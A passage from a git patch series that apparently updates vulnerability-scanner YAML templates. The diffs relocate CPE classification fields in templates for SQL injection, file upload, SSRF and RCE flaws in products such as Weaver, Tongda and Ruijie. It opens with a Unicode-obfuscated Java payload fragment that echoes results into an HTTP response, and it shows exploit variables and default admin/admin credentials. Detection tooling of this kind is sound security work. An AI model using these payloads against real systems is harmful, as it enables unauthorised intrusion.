0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d' diff --git a/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml b/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml index 03583ba456..139f77e820 100644 --- a/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml +++ b/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml @@ -7,6 +7,8 @@ info: description: Office Web Apps Server Full Read is vulnerable to SSRF. reference: - https://drive.google.com/file/d/1aeNq_5wVwHRR1np1jIRQM1hocrgcZ6Qu/view (Slide 37,38) + classification: + cpe: cpe:2.3:a:microsoft:office_web_apps_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -15,8 +17,6 @@ info: product: office_web_apps_server vendor: microsoft tags: microsoft,office-webapps,redirect - classification: - cpe: cpe:2.3:a:microsoft:office_web_apps_server:*:*:*:*:*:*:*:* variables: oast: "{{interactsh-url}}" string: "{{to_lower(rand_text_alpha(4))}}" diff --git a/http/vulnerabilities/other/flir-ax8-rce.yaml b/http/vulnerabilities/other/flir-ax8-rce.yaml index a4c876e91d..61b2f114e5 100644 --- a/http/vulnerabilities/other/flir-ax8-rce.yaml +++ b/http/vulnerabilities/other/flir-ax8-rce.yaml @@ -9,6 +9,8 @@ info: reference: - https://www.exploit-db.com/exploits/45602 - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E8%8F%B2%E5%8A%9B%E5%B0%94/FLIR-AX8%20res.php%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 @@ -16,8 +18,6 @@ info: product: flir_ax8_firmware vendor: flir tags: flir-ax8,rce,exploitdb,iot,sensor,authenticated - classification: - cpe: cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:* variables: username: admin password: admin diff --git a/http/vulnerabilities/other/opencart-core-sqli.yaml b/http/vulnerabilities/other/opencart-core-sqli.yaml index 80e8ecf99f..4f9040f5ce 100644 --- a/http/vulnerabilities/other/opencart-core-sqli.yaml +++ b/http/vulnerabilities/other/opencart-core-sqli.yaml @@ -9,6 +9,8 @@ info: reference: - https://www.exploit-db.com/exploits/51940 - https://cxsecurity.com/issue/WLB-2024040004 + classification: + cpe: cpe:2.3:a:opencart:opencart:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: title:"OpenCart" @@ -16,8 +18,6 @@ info: product: opencart vendor: opencart tags: opencart,sqli - classification: - cpe: cpe:2.3:a:opencart:opencart:*:*:*:*:*:*:*:* flow: http(1) && http(2) http: diff --git a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml index 01a3c9360b..423e8a9904 100644 --- a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml @@ -8,6 +8,8 @@ info: There is a command execution vulnerability in the nmc_sync.php interface of Ruijie's RG-UAC unified online behavior management and audit system. An unauthenticated attacker can execute arbitrary commands to control server permissions. reference: - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py + classification: + cpe: cpe:2.3:h:ruijie:rg-uac:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 @@ -15,8 +17,7 @@ info: product: rg-uac vendor: ruijie tags: rg-uac,file-upload,intrusive,ruijie - classification: - cpe: cpe:2.3:h:ruijie:rg-uac:*:*:*:*:*:*:*:* + variables: random_str: "{{rand_base(6)}}" match_str: "{{md5(random_str)}}" diff --git a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml index 5ff47a466d..6075609ebe 100755 --- a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml +++ b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml @@ -8,6 +8,8 @@ info: There is an arbitrary command execution vulnerability in the getdata interface of Tongda OA v11.9. An attacker can execute arbitrary commands on the server to control server permissions through the vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -15,8 +17,7 @@ info: product: office_anywhere vendor: tongda2000 tags: tongda,rce - classification: - cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* + variables: num: '999999999' payload: "echo md5({{num}});" diff --git a/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml index 3771e1dd1f..201db8197a 100644 --- a/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml +++ b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml @@ -8,6 +8,8 @@ info: Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization. reference: - https://github.com/RCEraser/cve/blob/main/Weaver.md + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 @@ -15,8 +17,7 @@ info: product: e-office vendor: weaver tags: e-office,weaver,intrusive,file-upload - classification: - cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* + variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml index bbceca8e42..9806ace3e5 100755 --- a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml @@ -8,6 +8,8 @@ info: When the getSqlData interface of the Panwei e-cology OA system uses the mssql database, the built-in SQL statements are not spliced strictly, resulting in a SQL injection vulnerability. reference: - https://github.com/Wrin9/weaverOA_sql_RCE/blob/14cca7a6da7a4a81e7c7a7016cb0da75b8b290bc/weaverOA_sql_injection_POC_EXP.py#L46 + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 @@ -16,8 +18,7 @@ info: product: e-cology vendor: weaver tags: ecology,weaver,oa,sqli - classification: - cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* + variables: num: "999999999" diff --git a/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml index 03c04d9446..44177beb47 100755 --- a/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml @@ -8,6 +8,8 @@ info: There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability. reference: - https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3 + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -16,8 +18,7 @@ info: product: e-cology vendor: weaver tags: ecology,weaver,oa,sqli - classification: - cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* + variables: num: "999999999" diff --git a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml index eb49c377f7..752f06dec4 100755 --- a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml @@ -7,6 +7,8 @@ info: description: Arbitrary File Upload in OA E-Office jQuery. reference: - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 @@ -14,8 +16,7 @@ info: product: e-office vendor: weaver tags: weaver,e-office,oa,instrusive,rce,intrusive - classification: - cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* + variables: filename: "{{to_lower(rand_base(5))}}" string: "{{randstr}}" diff --git a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml index f69bda6c3c..1785f468b3 100755 --- a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml @@ -8,6 +8,8 @@ info: There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it. reference: - https://buaq.net/go-117479.html + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 @@ -16,8 +18,7 @@ info: product: e-cology vendor: weaver tags: weaver,ecology,fileupload,intrusive - classification: - cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* + variables: num1: "{{rand_int(40000, 50000)}}" num2: "{{rand_int(40000, 50000)}}" diff --git a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml index 10e7a1756d..794b905aa8 100755 --- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml @@ -8,6 +8,8 @@ info: OA E-Office OfficeServer.php has an arbitrary file upload vulnerability. Attackers can obtain sensitive information on the server through the vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20OfficeServer.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 @@ -15,8 +17,7 @@ info: product: e-office vendor: weaver tags: weaver,e-office,oa,rce,intrusive,fileupload - classification: - cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* + variables: filename: "{{to_lower(rand_base(5))}}" string: "weaver-office-server-file-upload" diff --git a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml index 07d85433e7..225ba659ce 100755 --- a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml @@ -9,14 +9,15 @@ info: reference: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: max-request: 3 fofa-query: app="泛微-协同办公OA" product: e-cology vendor: weaver tags: ecology,fileupload,intrusive - classification: - cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* + variables: filename: "{{to_lower(rand_base(5))}}" string: "{{randstr}}" diff --git a/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml index edfe479688..95ac061288 100644 --- a/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml +++ b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml @@ -12,6 +12,8 @@ info: - http://wordpress.org/extend/plugins/gallery-plugin/ - http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip - https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353 + classification: + cpe: cpe:2.3:a:bestwebsoft:gallery:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 2 @@ -20,8 +22,7 @@ info: product: gallery vendor: bestwebsoft tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive - classification: - cpe: cpe:2.3:a:bestwebsoft:gallery:*:*:*:*:wordpress:*:*:* + variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml index 740d839410..b07016b364 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml @@ -9,6 +9,8 @@ info: reference: - https://www.seebug.org/vuldb/ssvid-99547 - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 @@ -16,8 +18,7 @@ info: product: ufida-nc vendor: yonyou tags: yonyou,intrusive,ufida,fileupload - classification: - cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* + variables: v1: "{{rand_int(1,100)}}" diff --git a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml index 5a9dc06e87..373944a7b9 100644 --- a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml +++ b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml @@ -7,6 +7,8 @@ info: description: ZzzCMS (A Lightweight ASP.NET content management system) is vulnerable to SSRF(Server-Side Request Forgery). reference: - https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html + classification: + cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -15,8 +17,7 @@ info: product: zzzcms vendor: zzzcms tags: zzzcms,ssrf,oast - classification: - cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:* + variables: filename: "{{to_lower(rand_text_alpha(4))}}" From 7d276ebee0677c095ce56af59e0d1c65bf8e2dd6 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 10 Sep 2024 14:38:16 +0530 Subject: [PATCH 3/3] Fix classification Fix classification --- http/cnvd/2020/CNVD-2020-63964.yaml | 19 ++++++++-------- http/cnvd/2021/CNVD-2021-15822.yaml | 11 +++++----- http/cnvd/2022/CNVD-2022-43245.yaml | 10 ++++----- http/cnvd/2024/CNVD-2024-15077.yaml | 11 +++++----- http/cves/2023/CVE-2023-42344.yaml | 15 ++++++++----- http/cves/2024/CVE-2024-27564.yaml | 11 +++++----- http/cves/2024/CVE-2024-33288.yaml | 12 +++++----- http/cves/2024/CVE-2024-34982.yaml | 13 +++++------ http/cves/2024/CVE-2024-3552.yaml | 13 +++++------ http/cves/2024/CVE-2024-36837.yaml | 12 +++++----- http/cves/2024/CVE-2024-37032.yaml | 12 +++++----- http/cves/2024/CVE-2024-37152.yaml | 11 +++++----- http/cves/2024/CVE-2024-38289.yaml | 12 +++++----- http/cves/2024/CVE-2024-3922.yaml | 12 +++++----- http/cves/2024/CVE-2024-6781.yaml | 21 +++++++++--------- http/cves/2024/CVE-2024-6782.yaml | 11 +++++----- http/cves/2024/CVE-2024-6922.yaml | 5 +++-- .../apache/apache-apollo-default-login.yaml | 13 +++++------ .../apache/cloudstack-default-login.yaml | 13 +++++------ .../apache/kylin-default-login.yaml | 10 ++++----- .../apache/tomcat-default-login.yaml | 16 +++++++------- .../asus/asus-rtn16-default-login.yaml | 11 +++++----- .../barco-clickshare-default-login.yaml | 20 ++++++++--------- .../batflat/batflat-default-login.yaml | 10 ++++----- .../bloofoxcms-default-login.yaml | 10 ++++----- .../crushftp/crushftp-anonymous-login.yaml | 14 +++++------- .../crushftp/crushftp-default-login.yaml | 16 ++++++-------- .../dataease/dataease-default-login.yaml | 11 +++++----- .../elasticsearch-default-login.yaml | 10 ++++----- .../esafenet-cdg-default-login.yaml | 10 ++++----- .../eurotel/etl3100-default-login.yaml | 10 ++++----- .../feiyuxing/feiyuxing-default-login.yaml | 10 ++++----- .../franklin-fueling-default-login.yaml | 10 ++++----- .../fuji-xerox/fuji-xerox-default-login.yaml | 19 ++++++++-------- .../gitblit/gitblit-default-login.yaml | 19 ++++++++-------- .../ispconfig-hcp-default-login.yaml | 19 ++++++++-------- .../jeedom/jeedom-default-login.yaml | 13 +++++------ .../mantisbt/mantisbt-anonymous-login.yaml | 11 +++++----- .../nacos/nacos-default-login.yaml | 10 ++++----- .../netflow/netflow-default-login.yaml | 11 +++++----- .../node-red/nodered-default-login.yaml | 11 +++++----- .../o2oa/o2oa-default-login.yaml | 10 ++++----- .../others/aruba-instant-default-login.yaml | 10 ++++----- .../inspur-clusterengine-default-login.yaml | 16 +++++++------- .../powerjob-default-login.yaml | 10 ++++----- .../pyload/pyload-default-login.yaml | 10 ++++----- .../rainloop/rainloop-default-login.yaml | 11 +++++----- .../default-logins/rconfig-default-login.yaml | 10 ++++----- .../riello/netman-default-login.yaml | 10 ++++----- .../rundeck/rundeck-default-login.yaml | 13 +++++------ .../softether-vpn-default-login.yaml | 13 ++++++----- .../splunk/splunk-default-login.yaml | 13 ++++++----- http/default-logins/wazuh-default-login.yaml | 11 +++++----- http/exposed-panels/acti-panel.yaml | 11 +++++----- http/exposed-panels/adguard-panel.yaml | 19 ++++++++-------- http/exposed-panels/airos-panel.yaml | 11 +++++----- .../apache/apache-apollo-panel.yaml | 11 +++++----- http/exposed-panels/aspcms-backend-panel.yaml | 11 +++++----- .../atlassian-bamboo-panel.yaml | 11 +++++----- http/exposed-panels/audiobookshelf-panel.yaml | 4 ++-- http/exposed-panels/authelia-panel.yaml | 11 +++++----- .../beyondtrust-priv-panel.yaml | 12 +++++----- http/exposed-panels/bonobo-server-panel.yaml | 13 ++++++----- .../busybox-repository-browser.yaml | 11 +++++----- http/exposed-panels/c2/caldera-c2.yaml | 11 +++++----- .../exposed-panels/changedetection-panel.yaml | 11 +++++----- http/exposed-panels/cisco-unity-panel.yaml | 13 ++++++----- .../cisco/cisco-expressway-panel.yaml | 11 +++++----- http/exposed-panels/craftercms-panel.yaml | 11 +++++----- http/exposed-panels/cyberchef-panel.yaml | 11 +++++----- http/exposed-panels/dialogic-xms-console.yaml | 11 +++++----- http/exposed-panels/discuz-panel.yaml | 11 +++++----- http/exposed-panels/dockge-panel.yaml | 11 +++++----- http/exposed-panels/dokuwiki-panel.yaml | 11 +++++----- http/exposed-panels/doris-panel.yaml | 11 +++++----- http/exposed-panels/emqx-panel.yaml | 11 +++++----- .../endpoint-protector-panel.yaml | 11 +++++----- .../fortinet/forticlientems-panel.yaml | 11 +++++----- http/exposed-panels/fossbilling-panel.yaml | 11 +++++----- http/exposed-panels/freshrss-panel.yaml | 19 ++++++++-------- http/exposed-panels/ghost-panel.yaml | 11 +++++----- .../gradle/gradle-develocity-panel.yaml | 19 ++++++++-------- http/exposed-panels/graylog-panel.yaml | 11 +++++----- http/exposed-panels/ibm/ibm-odm-panel.yaml | 13 ++++++----- http/exposed-panels/isams-panel.yaml | 11 +++++----- http/exposed-panels/jsherp-boot-panel.yaml | 11 +++++----- http/exposed-panels/kiali-panel.yaml | 11 +++++----- http/exposed-panels/koel-panel.yaml | 12 +++++----- http/exposed-panels/kopano-webapp-panel.yaml | 12 +++++----- http/exposed-panels/label-studio-panel.yaml | 11 +++++----- http/exposed-panels/librephotos-panel.yaml | 11 +++++----- http/exposed-panels/mitel-micollab-panel.yaml | 11 +++++----- http/exposed-panels/mobileiron-sentry.yaml | 11 +++++----- http/exposed-panels/monitorr-panel.yaml | 11 +++++----- .../moodle-workplace-panel.yaml | 11 +++++----- http/exposed-panels/n8n-panel.yaml | 11 +++++----- .../netflow-analyzer-panel.yaml | 19 ++++++++-------- http/exposed-panels/nocodb-panel.yaml | 12 +++++----- http/exposed-panels/openedge-panel.yaml | 19 ++++++++-------- http/exposed-panels/openvas-panel.yaml | 11 +++++----- .../oracle-ebusiness-panel.yaml | 12 +++++----- .../outsystems-servicecenter-panel.yaml | 11 +++++----- http/exposed-panels/passbolt-panel.yaml | 11 +++++----- http/exposed-panels/phpldapadmin-panel.yaml | 11 +++++----- http/exposed-panels/posteio-admin-panel.yaml | 11 +++++----- .../qlikview-accesspoint-panel.yaml | 12 +++++----- .../redis-enterprise-panel.yaml | 11 +++++----- http/exposed-panels/redmine-panel.yaml | 11 +++++----- http/exposed-panels/rocketchat-panel.yaml | 11 +++++----- .../scriptcase/scriptcase-panel.yaml | 11 +++++----- .../scriptcase/scriptcase-prod-login.yaml | 11 +++++----- http/exposed-panels/softether-vpn-panel.yaml | 11 +++++----- http/exposed-panels/speedtest-panel.yaml | 11 +++++----- .../exposed-panels/suprema-biostar-panel.yaml | 11 +++++----- http/exposed-panels/tibco-spotfire-panel.yaml | 4 ++-- http/exposed-panels/tigase-xmpp-server.yaml | 11 +++++----- http/exposed-panels/tiny-rss-panel.yaml | 11 +++++----- .../uipath-orchestrator-panel.yaml | 11 +++++----- http/exposed-panels/unibox-panel.yaml | 11 +++++----- http/exposed-panels/uptime-kuma-panel.yaml | 11 +++++----- http/exposed-panels/urbackup-panel.yaml | 11 +++++----- .../webtransfer-client-panel.yaml | 11 +++++----- http/exposed-panels/whatsup-gold-panel.yaml | 13 ++++++----- http/exposed-panels/yellowfin-panel.yaml | 11 +++++----- .../exposed-panels/zenml-dashboard-panel.yaml | 13 ++++++----- http/exposures/apis/jeecg-boot-swagger.yaml | 11 +++++----- http/exposures/apis/seafile-api.yaml | 10 ++++----- .../exposures/configs/codeception-config.yaml | 4 ++-- .../configs/filestash-admin-config.yaml | 11 +++++----- http/exposures/configs/jkstatus-manager.yaml | 11 +++++----- http/exposures/configs/phpsys-info.yaml | 10 ++++----- .../configs/rakefile-disclosure.yaml | 10 ++++----- http/exposures/configs/yii-debugger.yaml | 11 +++++----- http/exposures/files/angular-json.yaml | 10 ++++----- .../files/azure-pipelines-exposed.yaml | 11 +++++----- http/exposures/files/bitbucket-pipelines.yaml | 10 ++++----- http/exposures/files/cargo-toml-file.yaml | 10 ++++----- .../files/cold-fusion-cfcache-map.yaml | 17 +++++++------- http/exposures/files/composer-auth-json.yaml | 11 +++++----- http/exposures/files/django-secret-key.yaml | 10 ++++----- http/exposures/files/environment-rb.yaml | 11 +++++----- .../files/get-access-token-json.yaml | 11 +++++----- http/exposures/files/git-mailmap.yaml | 11 +++++----- http/exposures/files/gitlab-ci-yml.yaml | 11 +++++----- http/exposures/files/go-mod-disclosure.yaml | 11 +++++----- http/exposures/files/gradle-libs.yaml | 10 ++++----- .../exposures/files/npm-cli-metrics-json.yaml | 11 +++++----- .../files/npm-shrinkwrap-exposure.yaml | 10 ++++----- .../exposures/files/nuget-package-config.yaml | 10 ++++----- http/exposures/files/oracle-test-cgi.yaml | 10 ++++----- http/exposures/files/php-ini.yaml | 11 +++++----- .../files/phpunit-result-cache-exposure.yaml | 11 +++++----- .../files/pipeline-configuration.yaml | 10 ++++----- .../files/putty-private-key-disclosure.yaml | 11 +++++----- http/exposures/files/redmine-settings.yaml | 10 ++++----- http/exposures/files/ruby-rail-storage.yaml | 11 +++++----- http/exposures/files/secret-token-rb.yaml | 11 +++++----- http/exposures/files/secrets-file.yaml | 11 +++++----- http/exposures/files/sendgrid-env.yaml | 11 +++++----- http/exposures/files/svn-wc-db.yaml | 11 +++++----- .../files/symfony-properties-ini.yaml | 10 ++++----- http/exposures/files/symfony-security.yaml | 10 ++++----- http/exposures/files/token-info-json.yaml | 10 ++++----- http/exposures/files/uwsgi-ini.yaml | 10 ++++----- http/exposures/files/viminfo-disclosure.yaml | 10 ++++----- http/exposures/files/vscode-sftp.yaml | 10 ++++----- http/exposures/files/webpack-mix-js.yaml | 10 ++++----- http/exposures/files/wp-cli-exposure.yaml | 10 ++++----- http/exposures/files/ws-ftp-ini.yaml | 11 +++++----- http/exposures/logs/fastcgi-echo.yaml | 